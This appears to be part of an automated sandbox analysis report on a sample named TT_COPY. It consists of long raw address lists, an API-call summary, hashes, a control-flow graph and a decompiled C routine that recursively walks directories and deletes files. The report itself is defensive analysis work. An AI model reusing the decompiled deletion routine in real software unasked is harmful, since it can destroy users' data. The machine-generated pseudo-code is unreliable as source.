                                                                                                                            0x00000000
                                                                                                                            0x70b51f60
                                                                                                                            0x00000000
                                                                                                                            0x70b5214b
                                                                                                                            0x70b5214e
                                                                                                                            0x70b52151
                                                                                                                            0x70b52151
                                                                                                                            0x70b52152
                                                                                                                            0x70b52153
                                                                                                                            0x70b52156
                                                                                                                            0x70b52159
                                                                                                                            0x70b5215c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5215e
                                                                                                                            0x70b5215e
                                                                                                                            0x70b52162
                                                                                                                            0x70b5217a
                                                                                                                            0x70b5217d
                                                                                                                            0x70b52181
                                                                                                                            0x70b52187
                                                                                                                            0x00000000
                                                                                                                            0x70b52187
                                                                                                                            0x70b52164
                                                                                                                            0x70b52164
                                                                                                                            0x70b52167
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52169
                                                                                                                            0x70b5216c
                                                                                                                            0x70b5216e
                                                                                                                            0x70b5216f
                                                                                                                            0x70b5216f
                                                                                                                            0x70b5216f
                                                                                                                            0x70b52170
                                                                                                                            0x70b52173
                                                                                                                            0x70b52176
                                                                                                                            0x70b52177
                                                                                                                            0x70b52151
                                                                                                                            0x70b52152
                                                                                                                            0x70b52153
                                                                                                                            0x70b52156
                                                                                                                            0x70b52159
                                                                                                                            0x70b5215c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5215c
                                                                                                                            0x00000000
                                                                                                                            0x70b51fa7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51fb3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51f9a
                                                                                                                            0x70b51f9e
                                                                                                                            0x70b51fa2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5211c
                                                                                                                            0x70b52120
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52126
                                                                                                                            0x70b5212f
                                                                                                                            0x70b52136
                                                                                                                            0x70b5213e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52083
                                                                                                                            0x70b52083
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51fbc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b521a6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5208b
                                                                                                                            0x70b5208d
                                                                                                                            0x70b5208d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52196
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5219a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b521a2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520d3
                                                                                                                            0x70b520d5
                                                                                                                            0x70b520d5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5209d
                                                                                                                            0x70b5209f
                                                                                                                            0x70b5209f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520af
                                                                                                                            0x70b520b1
                                                                                                                            0x70b520b1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520e1
                                                                                                                            0x70b520e3
                                                                                                                            0x70b520e3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520ba
                                                                                                                            0x70b520bc
                                                                                                                            0x70b520bc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520c1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5219e
                                                                                                                            0x70b521a8
                                                                                                                            0x70b521a8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520ec
                                                                                                                            0x70b520f0
                                                                                                                            0x70b520f5
                                                                                                                            0x70b520f8
                                                                                                                            0x70b520f9
                                                                                                                            0x70b520fc
                                                                                                                            0x70b52102
                                                                                                                            0x70b52102
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5218e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520c5
                                                                                                                            0x70b520c7
                                                                                                                            0x70b520c7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51fc3
                                                                                                                            0x70b51fc3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520da
                                                                                                                            0x70b520dc
                                                                                                                            0x70b520dc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51f67
                                                                                                                            0x70b51f6d
                                                                                                                            0x70b51f70
                                                                                                                            0x70b51f72
                                                                                                                            0x70b51f72
                                                                                                                            0x70b51f75
                                                                                                                            0x70b51f79
                                                                                                                            0x70b51f86
                                                                                                                            0x70b51f88
                                                                                                                            0x70b51f8e
                                                                                                                            0x70b51f8e
                                                                                                                            0x70b51f8e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5208e
                                                                                                                            0x70b5208e
                                                                                                                            0x70b52090
                                                                                                                            0x70b52097
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520d6
                                                                                                                            0x70b520d6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520a0
                                                                                                                            0x70b520a0
                                                                                                                            0x70b520a2
                                                                                                                            0x70b520a9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520b2
                                                                                                                            0x70b520b2
                                                                                                                            0x70b520b4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520e4
                                                                                                                            0x70b520e4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520bd
                                                                                                                            0x70b520bd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5210a
                                                                                                                            0x70b5210e
                                                                                                                            0x70b52113
                                                                                                                            0x70b52116
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520c8
                                                                                                                            0x70b520c8
                                                                                                                            0x70b520cb
                                                                                                                            0x70b520cd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b520dd
                                                                                                                            0x70b520dd
                                                                                                                            0x70b520e6
                                                                                                                            0x70b520e6
                                                                                                                            0x70b51fc5
                                                                                                                            0x70b51fc5
                                                                                                                            0x70b51fc8
                                                                                                                            0x70b51fcf
                                                                                                                            0x70b51fd1
                                                                                                                            0x70b51fd3
                                                                                                                            0x70b51fda
                                                                                                                            0x70b51fdd
                                                                                                                            0x70b51fe2
                                                                                                                            0x70b51fe4
                                                                                                                            0x70b51fe6
                                                                                                                            0x70b51fea
                                                                                                                            0x70b51ff0
                                                                                                                            0x70b51ff6
                                                                                                                            0x70b51ff6
                                                                                                                            0x70b51ff8
                                                                                                                            0x70b51ff8
                                                                                                                            0x70b51ff9
                                                                                                                            0x70b51ff9
                                                                                                                            0x70b51ffd
                                                                                                                            0x70b52003
                                                                                                                            0x70b52005
                                                                                                                            0x70b52009
                                                                                                                            0x70b5200e
                                                                                                                            0x70b5200e
                                                                                                                            0x70b52010
                                                                                                                            0x70b52010
                                                                                                                            0x70b52013
                                                                                                                            0x70b52016
                                                                                                                            0x70b5201f
                                                                                                                            0x70b52025
                                                                                                                            0x70b52028
                                                                                                                            0x70b52028
                                                                                                                            0x70b5202a
                                                                                                                            0x70b5202d
                                                                                                                            0x70b52033
                                                                                                                            0x70b52039
                                                                                                                            0x70b52039
                                                                                                                            0x70b5203b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52041
                                                                                                                            0x70b52041
                                                                                                                            0x70b52045
                                                                                                                            0x70b5204c
                                                                                                                            0x70b52070
                                                                                                                            0x70b52070
                                                                                                                            0x70b52074
                                                                                                                            0x70b52076
                                                                                                                            0x70b52079
                                                                                                                            0x70b52079
                                                                                                                            0x70b5207c
                                                                                                                            0x70b5207c
                                                                                                                            0x00000000
                                                                                                                            0x70b52074
                                                                                                                            0x70b52051
                                                                                                                            0x70b52054
                                                                                                                            0x70b52054
                                                                                                                            0x70b5205b
                                                                                                                            0x70b5205d
                                                                                                                            0x70b52060
                                                                                                                            0x70b52067
                                                                                                                            0x70b52068
                                                                                                                            0x70b5206e
                                                                                                                            0x70b5206e
                                                                                                                            0x00000000
                                                                                                                            0x70b5206e
                                                                                                                            0x70b52062
                                                                                                                            0x70b52065
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52065
                                                                                                                            0x70b51ff2
                                                                                                                            0x70b51ff4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51f60
                                                                                                                            0x70b51e05
                                                                                                                            0x70b51e05
                                                                                                                            0x70b51e06
                                                                                                                            0x70b51f46
                                                                                                                            0x00000000
                                                                                                                            0x70b51f46
                                                                                                                            0x70b51e0c
                                                                                                                            0x70b51e0d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51e13
                                                                                                                            0x70b51e16
                                                                                                                            0x70b51f0b
                                                                                                                            0x70b51f0b
                                                                                                                            0x70b51f0e
                                                                                                                            0x70b51f23
                                                                                                                            0x70b51f25
                                                                                                                            0x70b51f25
                                                                                                                            0x70b51f26
                                                                                                                            0x70b51f29
                                                                                                                            0x70b51f2c
                                                                                                                            0x70b51f38
                                                                                                                            0x70b51f38
                                                                                                                            0x70b51f38
                                                                                                                            0x70b51f2e
                                                                                                                            0x70b51f2e
                                                                                                                            0x70b51f2e
                                                                                                                            0x70b51f3e
                                                                                                                            0x00000000
                                                                                                                            0x70b51f3e
                                                                                                                            0x70b51f10
                                                                                                                            0x70b51f10
                                                                                                                            0x70b51f11
                                                                                                                            0x70b51f1f
                                                                                                                            0x00000000
                                                                                                                            0x70b51f1f
                                                                                                                            0x70b51f14
                                                                                                                            0x70b51f15
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51f1b
                                                                                                                            0x00000000
                                                                                                                            0x70b51f1b
                                                                                                                            0x70b51e1c
                                                                                                                            0x70b51f07
                                                                                                                            0x00000000
                                                                                                                            0x70b51f07
                                                                                                                            0x70b51e22
                                                                                                                            0x70b51e22
                                                                                                                            0x70b51e25
                                                                                                                            0x70b51e4e
                                                                                                                            0x00000000
                                                                                                                            0x70b51e4e
                                                                                                                            0x70b51e27
                                                                                                                            0x70b51e27
                                                                                                                            0x70b51e2a
                                                                                                                            0x70b51e44
                                                                                                                            0x00000000
                                                                                                                            0x70b51e44
                                                                                                                            0x70b51e2c
                                                                                                                            0x70b51e2c
                                                                                                                            0x70b51e2f
                                                                                                                            0x70b51e3e
                                                                                                                            0x00000000
                                                                                                                            0x70b51e3e
                                                                                                                            0x70b51e32
                                                                                                                            0x70b51e33
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51e35
                                                                                                                            0x00000000
                                                                                                                            0x70b51cec
                                                                                                                            0x70b51cec
                                                                                                                            0x70b51cef
                                                                                                                            0x00000000
                                                                                                                            0x70b51cef
                                                                                                                            0x70b51ce6
                                                                                                                            0x70b51cd3
                                                                                                                            0x70b51cd8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51cda
                                                                                                                            0x70b51cdd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51cdd
                                                                                                                            0x70b51c6d
                                                                                                                            0x70b51c70
                                                                                                                            0x70b51ca6
                                                                                                                            0x70b51ca9
                                                                                                                            0x00000000
                                                                                                                            0x70b51caf
                                                                                                                            0x70b51cb1
                                                                                                                            0x70b51cb5
                                                                                                                            0x70b51cbc
                                                                                                                            0x70b51cc3
                                                                                                                            0x70b51cc6
                                                                                                                            0x70b51cc9
                                                                                                                            0x00000000
                                                                                                                            0x70b51cc9
                                                                                                                            0x70b51ca9
                                                                                                                            0x70b51c72
                                                                                                                            0x70b51c73
                                                                                                                            0x70b51c8e
                                                                                                                            0x70b51c91
                                                                                                                            0x00000000
                                                                                                                            0x70b51c97
                                                                                                                            0x70b51c97
                                                                                                                            0x70b51c9e
                                                                                                                            0x70b51ca1
                                                                                                                            0x00000000
                                                                                                                            0x70b51ca1
                                                                                                                            0x70b51c91
                                                                                                                            0x70b51c78
                                                                                                                            0x00000000
                                                                                                                            0x70b51c7e
                                                                                                                            0x70b51c7e
                                                                                                                            0x70b51c85
                                                                                                                            0x00000000
                                                                                                                            0x70b51c85
                                                                                                                            0x70b51c78
                                                                                                                            0x70b51e74
                                                                                                                            0x70b51e79
                                                                                                                            0x70b51e7e
                                                                                                                            0x70b51e82
                                                                                                                            0x70b52355
                                                                                                                            0x70b5235b
                                                                                                                            0x70b51e94
                                                                                                                            0x70b51e96
                                                                                                                            0x70b51e97
                                                                                                                            0x70b5227e
                                                                                                                            0x70b5227e
                                                                                                                            0x70b52281
                                                                                                                            0x70b52284
                                                                                                                            0x70b522a1
                                                                                                                            0x70b522a7
                                                                                                                            0x70b522a9
                                                                                                                            0x70b522af
                                                                                                                            0x70b522c6
                                                                                                                            0x70b522c6
                                                                                                                            0x70b522c6
                                                                                                                            0x70b522d3
                                                                                                                            0x70b522d9
                                                                                                                            0x70b522dc
                                                                                                                            0x70b522e2
                                                                                                                            0x70b522e4
                                                                                                                            0x70b522e8
                                                                                                                            0x70b522ea
                                                                                                                            0x70b522f1
                                                                                                                            0x70b522f6
                                                                                                                            0x70b522f9
                                                                                                                            0x70b522fb
                                                                                                                            0x70b52300
                                                                                                                            0x70b52312
                                                                                                                            0x70b52312
                                                                                                                            0x70b52300
                                                                                                                            0x70b522f9
                                                                                                                            0x70b522e8
                                                                                                                            0x70b52318
                                                                                                                            0x70b5231b
                                                                                                                            0x70b52325
                                                                                                                            0x70b5232d
                                                                                                                            0x70b5233a
                                                                                                                            0x70b52340
                                                                                                                            0x70b52343
                                                                                                                            0x70b52273
                                                                                                                            0x70b52273
                                                                                                                            0x00000000
                                                                                                                            0x70b52273
                                                                                                                            0x70b52349
                                                                                                                            0x70b5234f
                                                                                                                            0x70b5234f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52351
                                                                                                                            0x70b52351
                                                                                                                            0x70b52351
                                                                                                                            0x70b52351
                                                                                                                            0x00000000
                                                                                                                            0x70b5231d
                                                                                                                            0x70b5231d
                                                                                                                            0x70b52323
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52323
                                                                                                                            0x70b5231b
                                                                                                                            0x70b522b2
                                                                                                                            0x70b522b8
                                                                                                                            0x70b522ba
                                                                                                                            0x70b522c0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b522c0
                                                                                                                            0x70b52286
                                                                                                                            0x70b5228d
                                                                                                                            0x70b52293
                                                                                                                            0x70b52299
                                                                                                                            0x00000000
                                                                                                                            0x70b52299
                                                                                                                            0x70b51e9d
                                                                                                                            0x70b51e9e
                                                                                                                            0x70b5225d
                                                                                                                            0x70b5225d
                                                                                                                            0x70b52263
                                                                                                                            0x70b52266
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5226d
                                                                                                                            0x70b52272
                                                                                                                            0x00000000
                                                                                                                            0x70b52272
                                                                                                                            0x70b51ea5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51eab
                                                                                                                            0x70b51eab
                                                                                                                            0x70b51eb4
                                                                                                                            0x70b51eb9
                                                                                                                            0x70b51ebf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51ec5
                                                                                                                            0x70b51ed2
                                                                                                                            0x70b51ed8
                                                                                                                            0x70b51ee2
                                                                                                                            0x70b51ee8
                                                                                                                            0x70b51ef0
                                                                                                                            0x70b51f00
                                                                                                                            0x00000000
                                                                                                                            0x70b51f00

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 70B512BB: GlobalAlloc.KERNELBASE(00000040,?,70B512DB,?,70B5137F,00000019,70B511CA,-000000A0), ref: 70B512C5
                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 70B51D2D
                                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 70B51D75
                                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 70B51D7F
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B51D92
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 70B51E74
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 70B51E79
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 70B51E7E
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B52068
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 70B52222
                                                                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 70B522A1
                                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 70B522B2
                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 70B5230C
                                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 70B52326
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 245916457-0
                                                                                                                            • Opcode ID: 76879b76ebf46ae470eb8658bc64c177b367475f811e7b315d4af347b5843dff
                                                                                                                            • Instruction ID: e52d5e55bdf04f336832da4fcd7292b9f80bc367343ebe7b8ea37bbef230ca00
                                                                                                                            • Opcode Fuzzy Hash: 76879b76ebf46ae470eb8658bc64c177b367475f811e7b315d4af347b5843dff
                                                                                                                            • Instruction Fuzzy Hash: 7822BD71D0120ADEDB11CFA4C9806EEB7F4FB49305F2049AED566E7280E7B49B89DB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 612 405c49-405c6f call 405f14 615 405c71-405c83 DeleteFileW 612->615 616 405c88-405c8f 612->616 617 405e05-405e09 615->617 618 405c91-405c93 616->618 619 405ca2-405cb2 call 40653d 616->619 620 405db3-405db8 618->620 621 405c99-405c9c 618->621 627 405cc1-405cc2 call 405e58 619->627 628 405cb4-405cbf lstrcatW 619->628 620->617 624 405dba-405dbd 620->624 621->619 621->620 625 405dc7-405dcf call 406873 624->625 626 405dbf-405dc5 624->626 625->617 636 405dd1-405de5 call 405e0c call 405c01 625->636 626->617 630 405cc7-405ccb 627->630 628->630 632 405cd7-405cdd lstrcatW 630->632 633 405ccd-405cd5 630->633 635 405ce2-405cfe lstrlenW FindFirstFileW 632->635 633->632 633->635 637 405d04-405d0c 635->637 638 405da8-405dac 635->638 652 405de7-405dea 636->652 653 405dfd-405e00 call 40559f 636->653 640 405d2c-405d40 call 40653d 637->640 641 405d0e-405d16 637->641 638->620 643 405dae 638->643 654 405d42-405d4a 640->654 655 405d57-405d62 call 405c01 640->655 644 405d18-405d20 641->644 645 405d8b-405d9b FindNextFileW 641->645 643->620 644->640 648 405d22-405d2a 644->648 645->637 651 405da1-405da2 FindClose 645->651 648->640 648->645 651->638 652->626 657 405dec-405dfb call 40559f call 4062fd 652->657 653->617 654->645 658 405d4c-405d55 call 405c49 654->658 663 405d83-405d86 call 40559f 655->663 664 405d64-405d67 655->664 657->617 658->645 663->645 667 405d69-405d79 call 40559f call 4062fd 664->667 668 405d7b-405d81 664->668 667->645 668->645
                                                                                                                            C-Code - Quality: 98%
                                                                                                                            			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                            				signed int _v8;
                                                                                                                            				signed int _v12;
                                                                                                                            				short _v556;
                                                                                                                            				short _v558;
                                                                                                                            				struct _WIN32_FIND_DATAW _v604;
                                                                                                                            				signed int _t38;
                                                                                                                            				signed int _t52;
                                                                                                                            				signed int _t55;
                                                                                                                            				signed int _t62;
                                                                                                                            				void* _t64;
                                                                                                                            				signed char _t65;
                                                                                                                            				WCHAR* _t66;
                                                                                                                            				void* _t67;
                                                                                                                            				WCHAR* _t68;
                                                                                                                            				void* _t70;
                                                                                                                            
                                                                                                                            				_t65 = _a8;
                                                                                                                            				_t68 = _a4;
                                                                                                                            				_v8 = _t65 & 0x00000004;
                                                                                                                            				_t38 = E00405F14(__eflags, _t68);
                                                                                                                            				_v12 = _t38;
                                                                                                                            				if((_t65 & 0x00000008) != 0) {
                                                                                                                            					_t62 = DeleteFileW(_t68); // executed
                                                                                                                            					asm("sbb eax, eax");
                                                                                                                            					_t64 =  ~_t62 + 1;
                                                                                                                            					 *0x434f88 =  *0x434f88 + _t64;
                                                                                                                            					return _t64;
                                                                                                                            				}
                                                                                                                            				_a4 = _t65;
                                                                                                                            				_t8 =  &_a4;
                                                                                                                            				 *_t8 = _a4 & 0x00000001;
                                                                                                                            				__eflags =  *_t8;
                                                                                                                            				if( *_t8 == 0) {
                                                                                                                            					L5:
                                                                                                                            					E0040653D(0x42f270, _t68);
                                                                                                                            					__eflags = _a4;
                                                                                                                            					if(_a4 == 0) {
                                                                                                                            						E00405E58(_t68);
                                                                                                                            					} else {
                                                                                                                            						lstrcatW(0x42f270, L"\\*.*");
                                                                                                                            					}
                                                                                                                            					__eflags =  *_t68;
                                                                                                                            					if( *_t68 != 0) {
                                                                                                                            						L10:
                                                                                                                            						lstrcatW(_t68, 0x40a014);
                                                                                                                            						L11:
                                                                                                                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                                                            						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                                                                                            						_t70 = _t38;
                                                                                                                            						__eflags = _t70 - 0xffffffff;
                                                                                                                            						if(_t70 == 0xffffffff) {
                                                                                                                            							L26:
                                                                                                                            							__eflags = _a4;
                                                                                                                            							if(_a4 != 0) {
                                                                                                                            								_t30 = _t66 - 2;
                                                                                                                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                                                            								__eflags =  *_t30;
                                                                                                                            							}
                                                                                                                            							goto L28;
                                                                                                                            						} else {
                                                                                                                            							goto L12;
                                                                                                                            						}
                                                                                                                            						do {
                                                                                                                            							L12:
                                                                                                                            							__eflags = _v604.cFileName - 0x2e;
                                                                                                                            							if(_v604.cFileName != 0x2e) {
                                                                                                                            								L16:
                                                                                                                            								E0040653D(_t66,  &(_v604.cFileName));
                                                                                                                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                                                            								if(__eflags == 0) {
                                                                                                                            									_t52 = E00405C01(__eflags, _t68, _v8);
                                                                                                                            									__eflags = _t52;
                                                                                                                            									if(_t52 != 0) {
                                                                                                                            										E0040559F(0xfffffff2, _t68);
                                                                                                                            									} else {
                                                                                                                            										__eflags = _v8 - _t52;
                                                                                                                            										if(_v8 == _t52) {
                                                                                                                            											 *0x434f88 =  *0x434f88 + 1;
                                                                                                                            										} else {
                                                                                                                            											E0040559F(0xfffffff1, _t68);
                                                                                                                            											E004062FD(_t67, _t68, 0);
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								} else {
                                                                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                            									if(__eflags == 0) {
                                                                                                                            										E00405C49(__eflags, _t68, _a8);
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								goto L24;
                                                                                                                            							}
                                                                                                                            							__eflags = _v558;
                                                                                                                            							if(_v558 == 0) {
                                                                                                                            								goto L24;
                                                                                                                            							}
                                                                                                                            							__eflags = _v558 - 0x2e;
                                                                                                                            							if(_v558 != 0x2e) {
                                                                                                                            								goto L16;
                                                                                                                            							}
                                                                                                                            							__eflags = _v556;
                                                                                                                            							if(_v556 == 0) {
                                                                                                                            								goto L24;
                                                                                                                            							}
                                                                                                                            							goto L16;
                                                                                                                            							L24:
                                                                                                                            							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                                                            							__eflags = _t55;
                                                                                                                            						} while (_t55 != 0);
                                                                                                                            						_t38 = FindClose(_t70);
                                                                                                                            						goto L26;
                                                                                                                            					}
                                                                                                                            					__eflags =  *0x42f270 - 0x5c;
                                                                                                                            					if( *0x42f270 != 0x5c) {
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					goto L10;
                                                                                                                            				} else {
                                                                                                                            					__eflags = _t38;
                                                                                                                            					if(_t38 == 0) {
                                                                                                                            						L28:
                                                                                                                            						__eflags = _a4;
                                                                                                                            						if(_a4 == 0) {
                                                                                                                            							L36:
                                                                                                                            							return _t38;
                                                                                                                            						}
                                                                                                                            						__eflags = _v12;
                                                                                                                            						if(_v12 != 0) {
                                                                                                                            							_t38 = E00406873(_t68);
                                                                                                                            							__eflags = _t38;
                                                                                                                            							if(_t38 == 0) {
                                                                                                                            								goto L36;
                                                                                                                            							}
                                                                                                                            							E00405E0C(_t68);
                                                                                                                            							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                                                                                            							__eflags = _t38;
                                                                                                                            							if(_t38 != 0) {
                                                                                                                            								return E0040559F(0xffffffe5, _t68);
                                                                                                                            							}
                                                                                                                            							__eflags = _v8;
                                                                                                                            							if(_v8 == 0) {
                                                                                                                            								goto L30;
                                                                                                                            							}
                                                                                                                            							E0040559F(0xfffffff1, _t68);
                                                                                                                            							return E004062FD(_t67, _t68, 0);
                                                                                                                            						}
                                                                                                                            						L30:
                                                                                                                            						 *0x434f88 =  *0x434f88 + 1;
                                                                                                                            						return _t38;
                                                                                                                            					}
                                                                                                                            					__eflags = _t65 & 0x00000002;
                                                                                                                            					if((_t65 & 0x00000002) == 0) {
                                                                                                                            						goto L28;
                                                                                                                            					}
                                                                                                                            					goto L5;
                                                                                                                            				}
                                                                                                                            			}


















                                                                                                                            0x00405c53
                                                                                                                            0x00405c58
                                                                                                                            0x00405c61
                                                                                                                            0x00405c64
                                                                                                                            0x00405c6c
                                                                                                                            0x00405c6f
                                                                                                                            0x00405c72
                                                                                                                            0x00405c7a
                                                                                                                            0x00405c7c
                                                                                                                            0x00405c7d
                                                                                                                            0x00000000
                                                                                                                            0x00405c7d
                                                                                                                            0x00405c88
                                                                                                                            0x00405c8b
                                                                                                                            0x00405c8b
                                                                                                                            0x00405c8b
                                                                                                                            0x00405c8f
                                                                                                                            0x00405ca2
                                                                                                                            0x00405ca9
                                                                                                                            0x00405cae
                                                                                                                            0x00405cb2
                                                                                                                            0x00405cc2
                                                                                                                            0x00405cb4
                                                                                                                            0x00405cba
                                                                                                                            0x00405cba
                                                                                                                            0x00405cc7
                                                                                                                            0x00405ccb
                                                                                                                            0x00405cd7
                                                                                                                            0x00405cdd
                                                                                                                            0x00405ce2
                                                                                                                            0x00405ce8
                                                                                                                            0x00405cf3
                                                                                                                            0x00405cf9
                                                                                                                            0x00405cfb
                                                                                                                            0x00405cfe
                                                                                                                            0x00405da8
                                                                                                                            0x00405da8
                                                                                                                            0x00405dac
                                                                                                                            0x00405dae
                                                                                                                            0x00405dae
                                                                                                                            0x00405dae
                                                                                                                            0x00405dae
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405d04
                                                                                                                            0x00405d04
                                                                                                                            0x00405d04
                                                                                                                            0x00405d0c
                                                                                                                            0x00405d2c
                                                                                                                            0x00405d34
                                                                                                                            0x00405d39
                                                                                                                            0x00405d40
                                                                                                                            0x00405d5b
                                                                                                                            0x00405d60
                                                                                                                            0x00405d62
                                                                                                                            0x00405d86
                                                                                                                            0x00405d64
                                                                                                                            0x00405d64
                                                                                                                            0x00405d67
                                                                                                                            0x00405d7b
                                                                                                                            0x00405d69
                                                                                                                            0x00405d6c
                                                                                                                            0x00405d74
                                                                                                                            0x00405d74
                                                                                                                            0x00405d67
                                                                                                                            0x00405d42
                                                                                                                            0x00405d48
                                                                                                                            0x00405d4a
                                                                                                                            0x00405d50
                                                                                                                            0x00405d50
                                                                                                                            0x00405d4a
                                                                                                                            0x00000000
                                                                                                                            0x00405d40
                                                                                                                            0x00405d0e
                                                                                                                            0x00405d16
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405d18
                                                                                                                            0x00405d20
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405d22
                                                                                                                            0x00405d2a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405d8b
                                                                                                                            0x00405d93
                                                                                                                            0x00405d99
                                                                                                                            0x00405d99
                                                                                                                            0x00405da2
                                                                                                                            0x00000000
                                                                                                                            0x00405da2
                                                                                                                            0x00405ccd
                                                                                                                            0x00405cd5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405c91
                                                                                                                            0x00405c91
